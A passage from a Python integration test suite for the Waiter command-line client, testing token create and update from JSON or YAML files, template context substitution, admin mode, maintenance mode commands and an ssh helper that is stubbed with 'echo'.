util.post_token(self.waiter_url, token_name, token_fields)
try:
token_in_file = f'abc_{token_name}' if diff_token_in_file else token_name
with cli.temp_token_file({'token': token_in_file, **token_fields}, file_format) as path:
update_flags = f'--no-override {update_flags} --{file_format} {path}'
if diff_token_in_file:
update_flags = f'{update_flags} {token_name}'
cp = cli.update(self.waiter_url, flags='--verbose', update_flags=update_flags)
self.assertEqual(1, cp.returncode, cp.stderr)
stderr = cli.stderr(cp)
err_msg = 'You cannot specify the same parameter'
self.assertIn(err_msg, stderr)
finally:
util.delete_token(self.waiter_url, token_name)
def test_update_token_json_parameter_override_failure(self):
self.__test_update_token_override_failure('json', False)
def test_update_token_yaml_parameter_override_failure(self):
self.__test_update_token_override_failure('yaml', False)
def test_update_token_json_token_override_failure(self):
self.__test_update_token_override_failure('json', True)
def test_update_token_yaml_token_override_failure(self):
self.__test_update_token_override_failure('yaml', True)
def test_post_token_over_specified_token_name(self):
token_name = self.token_name()
with cli.temp_token_file({'token': token_name}) as path:
cp = cli.create(self.waiter_url, token_name, create_flags=f'--json {path}')
self.assertEqual(1, cp.returncode, cp.stderr)
self.assertIn('cannot specify the token name both as an argument and in the input file',
cli.stderr(cp))
def test_post_token_no_token_name(self):
cp = cli.create(self.waiter_url)
self.assertEqual(1, cp.returncode, cp.stderr)
self.assertIn('must specify the token name', cli.stderr(cp))
with cli.temp_token_file({'cpus': 0.1}) as path:
cp = cli.create(self.waiter_url, create_flags=f'--json {path}')
self.assertEqual(1, cp.returncode, cp.stderr)
self.assertIn('must specify the token name', cli.stderr(cp))
def test_implicit_args_lenient_parsing(self):
token_name = self.token_name()
cp = cli.create(self.waiter_url, token_name, create_flags='--cpus 0.1 --foo-level HIGH --bar-rate LOW')
self.assertEqual(1, cp.returncode, cp.stderr)
self.assertIn('Unsupported key(s)', cli.stderr(cp))
self.assertIn('foo-level', cli.stderr(cp))
self.assertIn('bar-rate', cli.stderr(cp))
def test_update_nested_args_no_override(self):
token_name = self.token_name()
initial_token_config = {'cmd': 'foo',
'cpus': 0.1,
'env': {'KEY_1': 'value_1',
'KEY_2': 'value_2'},
'mem': 128}
util.post_token(self.waiter_url, token_name, initial_token_config)
try:
update_flags = f'{token_name} --metadata.foo bar --env.KEY_2 new_value_2 --env.KEY_3 new_value_3'
cp = cli.update(self.waiter_url, flags='--verbose', update_flags=update_flags)
self.assertEqual(0, cp.returncode, cp.stderr)
token_data = util.load_token(self.waiter_url, token_name)
self.assertEqual(0.1, token_data['cpus'])
self.assertEqual(128, token_data['mem'])
self.assertEqual('foo', token_data['cmd'])
self.assertEqual({'KEY_1': 'value_1',
'KEY_2': 'new_value_2',
'KEY_3': 'new_value_3'},
token_data['env'])
self.assertEqual({'foo': 'bar'},
token_data['metadata'])
finally:
util.delete_token(self.waiter_url, token_name)
def __test_update_nested_args_with_overrides_success(self, file_format):
token_name = self.token_name()
initial_token_config = {'cmd': 'foo',
'cpus': 0.1,
'env': {'KEY_1': 'value_1',
'KEY_2': 'value_2'},
'mem': 128}
token_update_doc = {'token': token_name,
'cpus': 0.2,
'mem': 256,
'metadata': {'key1': 'value1'}}
explicit_update_flags = '--metadata.foo bar --env.KEY_2 new_value_2 --env.KEY_3 new_value_3'
util.post_token(self.waiter_url, token_name, initial_token_config)
try:
with cli.temp_token_file(token_update_doc, file_format) as path:
update_flags = f'--override {explicit_update_flags} --{file_format} {path}'
cp = cli.update(self.waiter_url, flags='--verbose', update_flags=update_flags)
self.assertEqual(0, cp.returncode, cp.stderr)
token_data = util.load_token(self.waiter_url, token_name)
self.assertEqual(0.2, token_data['cpus'])
self.assertEqual(256, token_data['mem'])
# override with file will shallow merge
self.assertEqual({'KEY_2': 'new_value_2',
'KEY_3': 'new_value_3'},
token_data['env'])
self.assertEqual({'foo': 'bar',
'key1': 'value1'},
token_data['metadata'])
finally:
util.delete_token(self.waiter_url, token_name)
def test_update_nested_args_json_with_overrides_success(self):
self.__test_update_nested_args_with_overrides_success('json')
def test_update_nested_args_yaml_with_overrides_success(self):
self.__test_update_nested_args_with_overrides_success('yaml')
def test_update_nested_args_json_with_overrides_failure(self):
self.__test_update_token_override_failure('json', False, update_flags="--env.FOO testing")
def test_update_nested_args_yaml_with_overrides_failure(self):
self.__test_update_token_override_failure('yaml', False, update_flags="--env.FOO testing")
def test_show_service_current(self):
token_name_1 = self.token_name()
token_name_2 = self.token_name()
iso_8601_time = datetime.datetime.utcnow().replace(tzinfo=datetime.timezone.utc).isoformat()
custom_fields = {
'owner': getpass.getuser(),
'cluster': 'test_show_service_current',
'root': 'test_show_service_current',
'last-update-user': getpass.getuser(),
'last-update-time': iso_8601_time
}
token_definition = util.minimal_service_description(**custom_fields)
# Post two identical tokens with different names
util.post_token(self.waiter_url, token_name_1, token_definition, update_mode_admin=True, assert_response=False)
util.post_token(self.waiter_url, token_name_2, token_definition, update_mode_admin=True, assert_response=False)
try:
# Assert that their etags match
etag_1 = util.load_token_with_headers(self.waiter_url, token_name_1)[1]['ETag']
etag_2 = util.load_token_with_headers(self.waiter_url, token_name_2)[1]['ETag']
self.assertEqual(etag_1, etag_2)
# Create service A from the two tokens
service_id_a = util.ping_token(self.waiter_url, f'{token_name_1},{token_name_2}')
# Update token #2 only and assert that their etags don't match
token_definition['cpus'] += 0.1
util.post_token(self.waiter_url, token_name_2, token_definition, update_mode_admin=True,
assert_response=False, etag=etag_1)
etag_1 = util.load_token_with_headers(self.waiter_url, token_name_1)[1]['ETag']
etag_2 = util.load_token_with_headers(self.waiter_url, token_name_2)[1]['ETag']
self.assertNotEqual(etag_1, etag_2)
# Create service B from the two tokens
service_id_b = util.ping_token(self.waiter_url, f'{token_name_1},{token_name_2}')
# Update token #1 to match token #2 and assert that their etags match
util.post_token(self.waiter_url, token_name_1, token_definition, update_mode_admin=True,
assert_response=False, etag=etag_1)
etag_1 = util.load_token_with_headers(self.waiter_url, token_name_1)[1]['ETag']
etag_2 = util.load_token_with_headers(self.waiter_url, token_name_2)[1]['ETag']
self.assertEqual(etag_1, etag_2)
# Update token #2 only and assert that their etags don't match
token_definition['cpus'] += 0.1
util.post_token(self.waiter_url, token_name_2, token_definition, update_mode_admin=True,
assert_response=False, etag=etag_1)
etag_1 = util.load_token_with_headers(self.waiter_url, token_name_1)[1]['ETag']
etag_2 = util.load_token_with_headers(self.waiter_url, token_name_2)[1]['ETag']
self.assertNotEqual(etag_1, etag_2)
# Create service C from the two tokens
service_id_c = util.ping_token(self.waiter_url, f'{token_name_1},{token_name_2}')
# For both tokens, only service C should be "current"
cp = cli.show(self.waiter_url, token_name_1)
self.assertEqual(0, cp.returncode, cp.stderr)
self.assertIsNotNone(re.search(f'^{service_id_a}.+Not Current$', cli.stdout(cp), re.MULTILINE))
self.assertIsNotNone(re.search(f'^{service_id_b}.+Not Current$', cli.stdout(cp), re.MULTILINE))
self.assertIsNotNone(re.search(f'^{service_id_c}.+Current$', cli.stdout(cp), re.MULTILINE))
cp = cli.show(self.waiter_url, token_name_2)
self.assertEqual(0, cp.returncode, cp.stderr)
self.assertIsNotNone(re.search(f'^{service_id_a}.+Not Current$', cli.stdout(cp), re.MULTILINE))
self.assertIsNotNone(re.search(f'^{service_id_b}.+Not Current$', cli.stdout(cp), re.MULTILINE))
self.assertIsNotNone(re.search(f'^{service_id_c}.+Current$', cli.stdout(cp), re.MULTILINE))
finally:
util.delete_token(self.waiter_url, token_name_1, kill_services=True)
util.delete_token(self.waiter_url, token_name_2, kill_services=True)
def test_create_token_output_stdout(self):
token_name = self.token_name()
token_fields = {
'cpus': 0.2,
'mem': 256,
'run-as-user': 'FAKE_USERNAME'
}
file_format = 'yaml'
stdin = cli.dump(file_format, token_fields)
flags = f'--output - --{file_format} -'
try:
cp = cli.create(self.waiter_url, token_name, flags='-v', stdin=stdin, create_flags=flags)
self.assertEqual(0, cp.returncode, cp.stderr)
util.load_token(self.waiter_url, token_name, expected_status_code=404)
stdout = cli.stdout(cp)
self.assertIn('Token configuration (as json) is:', stdout)
json_str = stdout[(stdout.rindex('is:') + 3):]
printed_token_fields = json.loads(json_str)
self.assertEqual(token_fields, printed_token_fields)
finally:
util.delete_token(self.waiter_url, token_name, expected_status_code=404)
def test_create_token_output_json(self):
token_name = self.token_name()
token_fields = {
'cpus': 0.2,
'mem': 256,
'run-as-user': 'FAKE_USERNAME'
}
file_format = 'yaml'
stdin = cli.dump(file_format, token_fields)
try:
with tempfile.NamedTemporaryFile(delete=True, suffix='.json') as output_file:
flags = f'--output {output_file.name} --{file_format} -'
cp = cli.create(self.waiter_url, token_name, flags='-v', stdin=stdin, create_flags=flags)
self.assertEqual(0, cp.returncode, cp.stderr)
util.load_token(self.waiter_url, token_name, expected_status_code=404)
stdout = cli.stdout(cp)
self.assertIn(f'Writing token configuration (as json) to {output_file.name}', stdout)
printed_token_fields = util.load_file('json', output_file.name)
self.assertEqual(token_fields, printed_token_fields)
finally:
util.delete_token(self.waiter_url, token_name, expected_status_code=404)
def test_update_token_output_stdout(self):
token_name = self.token_name()
base_fields = {
'cpus': 1.0,
'health-check-url': '/health',
'permitted-user': '*'
}
util.post_token(self.waiter_url, token_name, base_fields)
token_fields = {
'cpus': 0.2,
'mem': 256,
'run-as-user': 'FAKE_USERNAME'
}
file_format = 'yaml'
stdin = cli.dump(file_format, token_fields)
flags = f'--output - --{file_format} -'
try:
cp = cli.update(self.waiter_url, token_name, flags='-v', stdin=stdin, update_flags=flags)
self.assertEqual(0, cp.returncode, cp.stderr)
util.load_token(self.waiter_url, token_name)
stdout = cli.stdout(cp)
self.assertIn('Token configuration (as json) is:', stdout)
json_str = stdout[(stdout.rindex('is:') + 3):]
printed_token_fields = json.loads(json_str)
expected_fields = {**base_fields, **token_fields, 'owner': getpass.getuser()}
self.assertEqual(expected_fields, printed_token_fields)
finally:
util.delete_token(self.waiter_url, token_name)
def test_update_token_output_yaml(self):
token_name = self.token_name()
base_fields = {
'cpus': 1.0,
'health-check-url': '/health',
'permitted-user': '*'
}
util.post_token(self.waiter_url, token_name, base_fields)
token_fields = {
'cpus': 0.2,
'mem': 256,
'run-as-user': 'FAKE_USERNAME'
}
file_format = 'yaml'
stdin = cli.dump(file_format, token_fields)
try:
with tempfile.NamedTemporaryFile(delete=True, suffix='.yaml') as output_file:
flags = f'--output {output_file.name} --{file_format} -'
cp = cli.update(self.waiter_url, token_name, flags='-v', stdin=stdin, update_flags=flags)
self.assertEqual(0, cp.returncode, cp.stderr)
util.load_token(self.waiter_url, token_name)
stdout = cli.stdout(cp)
self.assertIn(f'Writing token configuration (as yaml) to {output_file.name}', stdout)
printed_token_fields = util.load_file('yaml', output_file.name)
expected_fields = {**base_fields, **token_fields, 'owner': getpass.getuser()}
self.assertEqual(expected_fields, printed_token_fields)
finally:
util.delete_token(self.waiter_url, token_name)
def __test_create_update_token_admin_mode(self, action, token_name, admin_mode):
token_fields = {
'cpus': 0.2,
'mem': 256,
'run-as-user': 'FAKE_USERNAME'
}
file_format = 'yaml'
stdin = cli.dump(file_format, token_fields)
flags = f'{"--admin " if admin_mode else ""}--{file_format} -'
temp_env = os.environ.copy()
temp_env["WAITER_ADMIN"] = 'true'
cp = getattr(cli, action)(self.waiter_url, token_name, flags='-v', stdin=stdin, env=temp_env,
**{f'{action}_flags': flags})
if admin_mode:
try:
token_data = util.load_token(self.waiter_url, token_name)
self.assertEqual(0, cp.returncode, cp.stderr)
self.assertIn('update-mode=admin', cli.stderr(cp))
self.assertIn(f'Attempting to {action} token in ADMIN mode', cli.stdout(cp))
for key, value in token_fields.items():
self.assertEqual(value, token_data[key])
finally:
util.delete_token(self.waiter_url, token_name)
else:
self.assertEqual(1, cp.returncode, cp.stderr)
self.assertIn('Cannot run as user: FAKE_USERNAME', cli.decode(cp.stderr))
def test_create_token_admin_mode(self):
self.__test_create_update_token_admin_mode('create', self.token_name(), True)
def test_create_token_no_admin_mode(self):
self.__test_create_update_token_admin_mode('create', self.token_name(), False)
def test_update_token_admin_mode(self):
token_name = self.token_name()
create_fields = {'cpus': 0.1, 'mem': 128, 'cmd': 'foo'}
util.post_token(self.waiter_url, token_name, create_fields)
self.__test_create_update_token_admin_mode('update', token_name, True)
def test_update_token_no_admin_mode(self):
self.__test_create_update_token_admin_mode('update', self.token_name(), False)
def __test_create_update_token_context_missing_data_failure(self, action):
token_name = self.token_name()
context_fields = {'fee': 'bar', 'fie': 'baz', 'foe': 'fum'}
try:
with cli.temp_token_file({**context_fields}, 'yaml') as path:
flags = f'--context {path}'
cp = getattr(cli, action)(self.waiter_url, token_name, flags='-v', **{f'{action}_flags': flags})
self.assertEqual(1, cp.returncode, cp.stderr)
stderr = cli.stderr(cp)
err_msg = '--context file can only be used when a data file is specified via --input, --json, or --yaml'
self.assertIn(err_msg, stderr)
finally:
# the token should not have been created, but cleaning up in case the test failed
util.delete_token(self.waiter_url, token_name, assert_response=False)
def test_create_token_context_missing_data_failure(self):
self.__test_create_update_token_context_missing_data_failure('create')
def test_update_token_context_missing_data_failure(self):
self.__test_create_update_token_context_missing_data_failure('update')
def __test_create_update_token_context_missing_file_failure(self, action, file_format):
token_name = self.token_name()
token_fields = {'cmd': 'foo-bar', 'cpus': 0.2, 'mem': 256}
try:
with cli.temp_token_file({**token_fields}, file_format) as token_path:
with tempfile.NamedTemporaryFile(delete=True) as file:
flags = f'--context {file.name} --{file_format} {token_path}'
cp = getattr(cli, action)(self.waiter_url, token_name, flags='-v', **{f'{action}_flags': flags})
self.assertEqual(1, cp.returncode, cp.stderr)
stderr = cli.stderr(cp)
err_msg = f'Unable to load context from {file.name}'
self.assertIn(err_msg, stderr)
finally:
# the token should not have been created, but cleaning up in case the test failed
util.delete_token(self.waiter_url, token_name, assert_response=False)
def test_create_token_context_missing_file_failure_json_data(self):
self.__test_create_update_token_context_missing_file_failure('create', 'json')
def test_create_token_context_missing_file_failure_yaml_data(self):
self.__test_create_update_token_context_missing_file_failure('create', 'yaml')
def test_update_token_context_missing_file_failure_json_data(self):
self.__test_create_update_token_context_missing_file_failure('update', 'json')
def test_update_token_context_missing_file_failure_yaml_data(self):
self.__test_create_update_token_context_missing_file_failure('update', 'yaml')
def __test_create_update_token_context_bad_format_failure(self, action, file_format):
token_name = self.token_name()
token_fields = {'cmd': 'foo-bar', 'cpus': 0.2, 'mem': 256}
try:
with cli.temp_token_file({**token_fields}, file_format) as token_path:
with cli.temp_file('foo-bar') as context_path:
flags = f'--context {context_path} --{file_format} {token_path}'
cp = getattr(cli, action)(self.waiter_url, token_name, flags='-v', **{f'{action}_flags': flags})
self.assertEqual(1, cp.returncode, cp.stderr)
stderr = cli.stderr(cp)
err_msg = 'Provided context file must evaluate to a dictionary, instead it is foo-bar'
self.assertIn(err_msg, stderr)
finally:
# the token should not have been created, but cleaning up in case the test failed
util.delete_token(self.waiter_url, token_name, assert_response=False)
def test_create_token_context_bad_format_failure_json_data(self):
self.__test_create_update_token_context_bad_format_failure('create', 'json')
def test_create_token_context_bad_format_failure_yaml_data(self):
self.__test_create_update_token_context_bad_format_failure('create', 'yaml')
def test_update_token_context_bad_format_failure_json_data(self):
self.__test_create_update_token_context_bad_format_failure('update', 'json')
def test_update_token_context_bad_format_failure_yaml_data(self):
self.__test_create_update_token_context_bad_format_failure('update', 'yaml')
def __test_create_update_token_context_success(self, action, file_format):
token_name = self.token_name()
context_fields = {'fee': 'bar', 'fie': 'baz', 'foe': 'fum'}
token_fields = {'cmd': '${fee}-${fie}', 'cpus': 0.2, 'mem': 256, 'metadata': {'foe': '${foe}'}}
try:
if action == 'update':
util.post_token(self.waiter_url, token_name, {'cpus': 0.1, 'mem': 128})
token_data = util.load_token(self.waiter_url, token_name)
self.assertEqual(0.1, token_data['cpus'])
self.assertEqual(128, token_data['mem'])
with cli.temp_token_file({**token_fields}, file_format) as token_path:
with cli.temp_token_file({**context_fields}, 'yaml') as context_path:
flags = f'--context {context_path} --{file_format} {token_path}'
cp = getattr(cli, action)(self.waiter_url, token_name, flags='-v', **{f'{action}_flags': flags})
self.assertEqual(0, cp.returncode, cp.stderr)
stdout = cli.stdout(cp)
out_msg = f'Successfully {action}d {token_name}'
self.assertIn(out_msg, stdout)
token_data = util.load_token(self.waiter_url, token_name)
self.assertEqual('bar-baz', token_data['cmd'])
self.assertEqual(0.2, token_data['cpus'])
self.assertEqual(256, token_data['mem'])
self.assertEqual({'foe': 'fum'}, token_data['metadata'])
finally:
util.delete_token(self.waiter_url, token_name)
def test_create_token_context_success_json_data(self):
self.__test_create_update_token_context_success('create', 'json')
def test_create_token_context_success_yaml_data(self):
self.__test_create_update_token_context_success('create', 'yaml')
def test_update_token_context_success_json_data(self):
self.__test_create_update_token_context_success('update', 'json')
def test_update_token_context_success_yaml_data(self):
self.__test_create_update_token_context_success('update', 'yaml')
def __test_create_update_token_context_missing_variable_failure(self, action, file_format):
token_name = self.token_name()
context_fields = {'fee': 'bar', 'fie': 'baz'}
token_fields = {'cmd': '${fee}-${fie}-${foe}', 'cpus': 0.2, 'mem': 256, 'metadata': {'foe': '${foe}'}}
try:
if action == 'update':
util.post_token(self.waiter_url, token_name, {'cpus': 0.1, 'mem': 128})
token_data = util.load_token(self.waiter_url, token_name)
self.assertEqual(0.1, token_data['cpus'])
self.assertEqual(128, token_data['mem'])
with cli.temp_token_file({**token_fields}, file_format) as token_path:
with cli.temp_token_file({**context_fields}, 'yaml') as context_path:
flags = f'--context {context_path} --{file_format} {token_path}'
cp = getattr(cli, action)(self.waiter_url, token_name, flags='-v', **{f'{action}_flags': flags})
self.assertEqual(1, cp.returncode, cp.stderr)
stderr = cli.stderr(cp)
err_msg = "Error when processing template: missing variable 'foe'"
self.assertIn(err_msg, stderr)
finally:
util.delete_token(self.waiter_url, token_name, assert_response=False)
def test_create_token_context_missing_variable_failure_json_data(self):
self.__test_create_update_token_context_missing_variable_failure('create', 'json')
def test_create_token_context_missing_variable_failure_yaml_data(self):
self.__test_create_update_token_context_missing_variable_failure('create', 'yaml')
def test_update_token_context_missing_variable_failure_json_data(self):
self.__test_create_update_token_context_missing_variable_failure('update', 'json')
def test_update_token_context_missing_variable_failure_yaml_data(self):
self.__test_create_update_token_context_missing_variable_failure('update', 'yaml')
def __test_create_update_token_context_override_variable_success(self, action, file_format):
token_name = self.token_name()
context_fields = {'fee': 'bar', 'fie': 'baz'}
token_fields = {'cmd': '${fee}-${fie}-${foe}', 'cpus': 0.2, 'mem': 256, 'metadata': {'foe': '${foe}'}}
try:
if action == 'update':
util.post_token(self.waiter_url, token_name, {'cpus': 0.1, 'mem': 128})
token_data = util.load_token(self.waiter_url, token_name)
self.assertEqual(0.1, token_data['cpus'])
self.assertEqual(128, token_data['mem'])
with cli.temp_token_file({**token_fields}, file_format) as token_path:
with cli.temp_token_file({**context_fields}, 'yaml') as context_path:
flags = f'--context {context_path} --context.fie box --context.foe fum --{file_format} {token_path}'
cp = getattr(cli, action)(self.waiter_url, token_name, flags='-v', **{f'{action}_flags': flags})
self.assertEqual(0, cp.returncode, cp.stderr)
stdout = cli.stdout(cp)
out_msg = f'Successfully {action}d {token_name}'
self.assertIn(out_msg, stdout)
token_data = util.load_token(self.waiter_url, token_name)
self.assertEqual('bar-box-fum', token_data['cmd'])
self.assertEqual(0.2, token_data['cpus'])
self.assertEqual(256, token_data['mem'])
self.assertEqual({'foe': 'fum'}, token_data['metadata'])
finally:
util.delete_token(self.waiter_url, token_name, assert_response=False)
def test_create_token_context_override_variable_success_json_data(self):
self.__test_create_update_token_context_override_variable_success('create', 'json')
def test_create_token_context_override_variable_success_yaml_data(self):
self.__test_create_update_token_context_override_variable_success('create', 'yaml')
def test_update_token_context_override_variable_success_json_data(self):
self.__test_create_update_token_context_override_variable_success('update', 'json')
def test_update_token_context_override_variable_success_yaml_data(self):
self.__test_create_update_token_context_override_variable_success('update', 'yaml')
def run_maintenance_start_test(self, cli_fn, start_args='', ping_token=False):
token_name = self.token_name()
token_fields = util.minimal_service_description()
custom_maintenance_message = "custom maintenance message"
util.post_token(self.waiter_url, token_name, token_fields)
try:
if ping_token:
cp = cli.ping(self.waiter_url, token_name)
self.assertEqual(0, cp.returncode, cp.stderr)
self.assertIn('Pinging token', cli.stdout(cp))
self.assertIn('successful', cli.stdout(cp))
util.wait_until_services_for_token(self.waiter_url, token_name, 1)
self.assertEqual(1, len(util.services_for_token(self.waiter_url, token_name)))
cp = cli_fn(token_name, self.waiter_url, maintenance_flags=f'{start_args} "{custom_maintenance_message}"')
self.assertEqual(0, cp.returncode, cp.stderr)
self.assertIn('Maintenance mode activated', cli.stdout(cp))
token_data = util.load_token(self.waiter_url, token_name)
self.assertEqual({'message': custom_maintenance_message}, token_data['maintenance'])
for key, value in token_fields.items():
self.assertEqual(value, token_data[key])
if ping_token:
num_services = 1 if '--no-kill' in start_args else 0
self.assertEqual(num_services,
len(util.wait_until_services_for_token(self.waiter_url, token_name, num_services)))
finally:
util.delete_token(self.waiter_url, token_name, kill_services=True)
def test_maintenance_start_basic(self):
self.run_maintenance_start_test(partial(cli.maintenance, 'start'))
def test_maintenance_start_no_service_ask_kill(self):
self.run_maintenance_start_test(partial(cli.maintenance, 'start'), start_args='--ask-kill')
def test_maintenance_start_no_service_force_kill(self):
self.run_maintenance_start_test(partial(cli.maintenance, 'start'), start_args='--force-kill')
def test_maintenance_start_no_service_no_kill(self):
self.run_maintenance_start_test(partial(cli.maintenance, 'start'), start_args='--no-kill')
def test_maintenance_start_ping_service_ask_kill(self):
self.run_maintenance_start_test(partial(cli.maintenance, 'start'), start_args='--ask-kill', ping_token=True)
def test_maintenance_start_ping_service_force_kill(self):
self.run_maintenance_start_test(partial(cli.maintenance, 'start'), start_args='--force-kill', ping_token=True)
def test_maintenance_start_ping_service_no_kill(self):
self.run_maintenance_start_test(partial(cli.maintenance, 'start'), start_args='--no-kill', ping_token=True)
def test_maintenance_start_nonexistent_token(self):
token_name = self.token_name()
custom_maintenance_message = "custom maintenance message"
cp = cli.maintenance('start', token_name, self.waiter_url,
maintenance_flags=f'"{custom_maintenance_message}"')
self.assertEqual(1, cp.returncode, cp.stderr)
self.assertIn('The token does not exist. You must create it first.', cli.stderr(cp))
def test_maintenance_start_no_cluster(self):
custom_maintenance_message = "custom maintenance message"
self.__test_no_cluster(partial(cli.maintenance, 'start',
maintenance_flags=f'"{custom_maintenance_message}"'))
def run_maintenance_stop_no_ping_test(self, cli_fn):
token_name = self.token_name()
token_fields = {'cpus': 0.1, 'mem': 128, 'cmd': 'foo'}
custom_maintenance_message = "custom maintenance message"
util.post_token(self.waiter_url, token_name,
{**token_fields, 'maintenance': {'message': custom_maintenance_message}})
try:
cp = cli_fn( token_name, self.waiter_url, maintenance_flags='--no-ping')
self.assertEqual(0, cp.returncode, cp.stderr)
stdout = cli.stdout(cp)
self.assertNotIn(f'Pinging token {token_name}', stdout)
self.assertNotIn(f'Ping successful', stdout)
token_data = util.load_token(self.waiter_url, token_name)
self.assertEqual(None, token_data.get('maintenance', None))
for key, value in token_fields.items():
self.assertEqual(value, token_data[key])
finally:
util.delete_token(self.waiter_url, token_name)
def test_maintenance_stop_no_ping(self):
self.run_maintenance_stop_no_ping_test(partial(cli.maintenance, 'stop'))
def run_maintenance_stop_with_ping_test(self, cli_fn):
token_name = self.token_name()
token_fields = util.minimal_service_description()
custom_maintenance_message = "custom maintenance message"
util.post_token(self.waiter_url, token_name,
{**token_fields, 'maintenance': {'message': custom_maintenance_message}})
try:
cp = cli_fn(token_name, self.waiter_url)
stdout = cli.stdout(cp)
self.assertEqual(0, cp.returncode, cp.stderr)
self.assertIn(f'Pinging token {token_name}', stdout)
self.assertIn('Ping successful', stdout)
token_data = util.load_token(self.waiter_url, token_name)
self.assertEqual(None, token_data.get('maintenance', None))
for key, value in token_fields.items():
self.assertEqual(value, token_data[key])
self.assertEqual(1, len(util.wait_until_services_for_token(self.waiter_url, token_name, 1)))
finally:
util.delete_token(self.waiter_url, token_name, kill_services=True)
def test_maintenance_stop_with_ping(self):
self.run_maintenance_stop_with_ping_test(partial(cli.maintenance, 'stop'))
def run_maintenance_stop_with_ping_no_wait_test(self, cli_fn):
token_name = self.token_name()
token_fields = util.minimal_service_description()
token_fields['cmd'] = f"sleep 30 && {token_fields['cmd']}"
custom_maintenance_message = "custom maintenance message"
util.post_token(self.waiter_url, token_name,
{**token_fields, 'maintenance': {'message': custom_maintenance_message}})
try:
cp = cli_fn(token_name, self.waiter_url, maintenance_flags='--no-wait')
stdout = cli.stdout(cp)
self.assertEqual(0, cp.returncode, cp.stderr)
self.assertIn(f'Pinging token {token_name}', stdout)
self.assertIn('Service is currently Starting', stdout)
token_data = util.load_token(self.waiter_url, token_name)
self.assertEqual(None, token_data.get('maintenance', None))
for key, value in token_fields.items():
self.assertEqual(value, token_data[key])
self.assertEqual(1, len(util.wait_until_services_for_token(self.waiter_url, token_name, 1)))
finally:
util.delete_token(self.waiter_url, token_name, kill_services=True)
def test_maintenance_stop_with_ping_no_wait(self):
self.run_maintenance_stop_with_ping_no_wait_test(partial(cli.maintenance, 'stop'))
def test_maintenance_stop_no_cluster(self):
self.__test_no_cluster(partial(cli.maintenance, 'stop'))
def run_maintenance_stop_enforce_check_not_in_maintenance_test(self, cli_fn):
token_name = self.token_name()
util.post_token(self.waiter_url, token_name, {'cpus': 0.1, 'mem': 128, 'cmd': 'foo'})
try:
cp = cli_fn(token_name, self.waiter_url, maintenance_flags='--check')
self.assertEqual(1, cp.returncode, cp.stderr)
self.assertIn('Token is not in maintenance mode', cli.stderr(cp))
finally:
util.delete_token(self.waiter_url, token_name)
def test_maintenance_stop_enforce_check_not_in_maintenance(self):
self.run_maintenance_stop_enforce_check_not_in_maintenance_test(partial(cli.maintenance, 'stop'))
def run_maintenance_stop_skip_check_not_in_maintenance_test(self, cli_fn):
token_name = self.token_name()
token_fields = util.minimal_service_description()
util.post_token(self.waiter_url, token_name, token_fields)
try:
cp = cli_fn(token_name, self.waiter_url)
stdout = cli.stdout(cp)
self.assertEqual(0, cp.returncode, cp.stderr)
self.assertIn(f'Token {token_name} does not have maintenance mode activated', stdout)
self.assertIn(f'Pinging token {token_name}', stdout)
self.assertIn('Service is currently Running', stdout)
token_data = util.load_token(self.waiter_url, token_name)
self.assertEqual(None, token_data.get('maintenance', None))
for key, value in token_fields.items():
self.assertEqual(value, token_data[key])
self.assertEqual(1, len(util.wait_until_services_for_token(self.waiter_url, token_name, 1)))
finally:
util.delete_token(self.waiter_url, token_name)
def test_maintenance_stop_skip_check_not_in_maintenance(self):
self.run_maintenance_stop_skip_check_not_in_maintenance_test(partial(cli.maintenance, 'stop'))
def __test_maintenance_check(self, maintenance_active):
token_name = self.token_name()
output = f'{token_name} is {"" if maintenance_active else "not "}in maintenance mode'
cli_return_code = 0 if maintenance_active else 1
if maintenance_active:
util.post_token(self.waiter_url, token_name,
{'cpus': 0.1, 'mem': 128, 'cmd': 'foo', 'maintenance': {'message': 'custom message'}})
else:
util.post_token(self.waiter_url, token_name, {'cpus': 0.1, 'mem': 128, 'cmd': 'foo'})
try:
cp = cli.maintenance('check', token_name, self.waiter_url)
self.assertEqual(cli_return_code, cp.returncode, cp.stderr)
self.assertIn(output, cli.stdout(cp))
finally:
util.delete_token(self.waiter_url, token_name)
def test_maintenance_check_not_in_maintenance_mode(self):
self.__test_maintenance_check(False)
def test_maintenance_check_in_maintenance_mode(self):
self.__test_maintenance_check(True)
def test_maintenance_no_sub_command(self):
cp = cli.maintenance('', '')
cp_help = cli.maintenance('', '', maintenance_flags='-h')
self.assertEqual(0, cp.returncode, cp.stderr)
self.assertEqual(cli.stdout(cp_help), cli.stdout(cp))
def __test_ssh(self, get_possible_instances_fn, command_to_run=None, stdin=None, min_instances=1, admin=False,
ssh_flags=None, container_name=None, is_failed_instance=False, test_service=False,
test_instance=False, multiple_services=False, quick=False, expect_no_data=False,
expect_no_instances=False, expect_out_of_range=False):
token_name = self.token_name()
token_fields = util.minimal_service_description()
token_fields['min-instances'] = min_instances
if is_failed_instance:
token_fields['cmd'] = 'this_is_an_invalid_command'
try:
if multiple_services:
token_new_fields = util.minimal_service_description()
util.post_token(self.waiter_url, token_name, token_new_fields)
util.ping_token(self.waiter_url, token_name)
util.post_token(self.waiter_url, token_name, token_fields)
service_id = util.ping_token(self.waiter_url, token_name,
expected_status_code=503 if is_failed_instance else 200)
if is_failed_instance:
goal_fn = lambda insts: 0 < len(insts['failed-instances']) and \
0 == len(insts['killed-instances'])
else:
goal_fn = lambda insts: min_instances == len(insts['active-instances']) and \
0 == len(insts['failed-instances']) and \
0 == len(insts['killed-instances'])
util.wait_until_routers_service(self.waiter_url, service_id, lambda service: goal_fn(service['instances']))
instances = util.instances_for_service(self.waiter_url, service_id)
env = os.environ.copy()
env['WAITER_SSH'] = 'echo'
env['WAITER_KUBECTL'] = 'echo'
if admin:
env['WAITER_ADMIN'] = 'true'
possible_instances = get_possible_instances_fn(service_id, instances)
ssh_flags = [ssh_flags] if ssh_flags else []
if quick:
ssh_flags.append('-q')
if container_name:
ssh_flags.append(f'--container-name {container_name}')
if test_instance:
possible_instances = possible_instances[0:1]
ssh_dest = possible_instances[0]['id']
ssh_flags.append('-i')
elif test_service:
ssh_dest = service_id
ssh_flags.append('-s')
else:
ssh_dest = token_name
cp = cli.ssh(self.waiter_url, ssh_dest, stdin=stdin, ssh_command=command_to_run,
ssh_flags=' '.join(ssh_flags),
env=env)
stdout = cli.stdout(cp)
if expect_out_of_range:
self.assertEqual(1, cp.returncode, cp.stderr)
self.assertIn('Input is out of range!', cli.stderr(cp))
elif expect_no_data:
self.assertEqual(1, cp.returncode, cp.stderr)
self.assertIn('No matching data found', stdout)
elif expect_no_instances:
self.assertEqual(1, cp.returncode, cp.stderr)
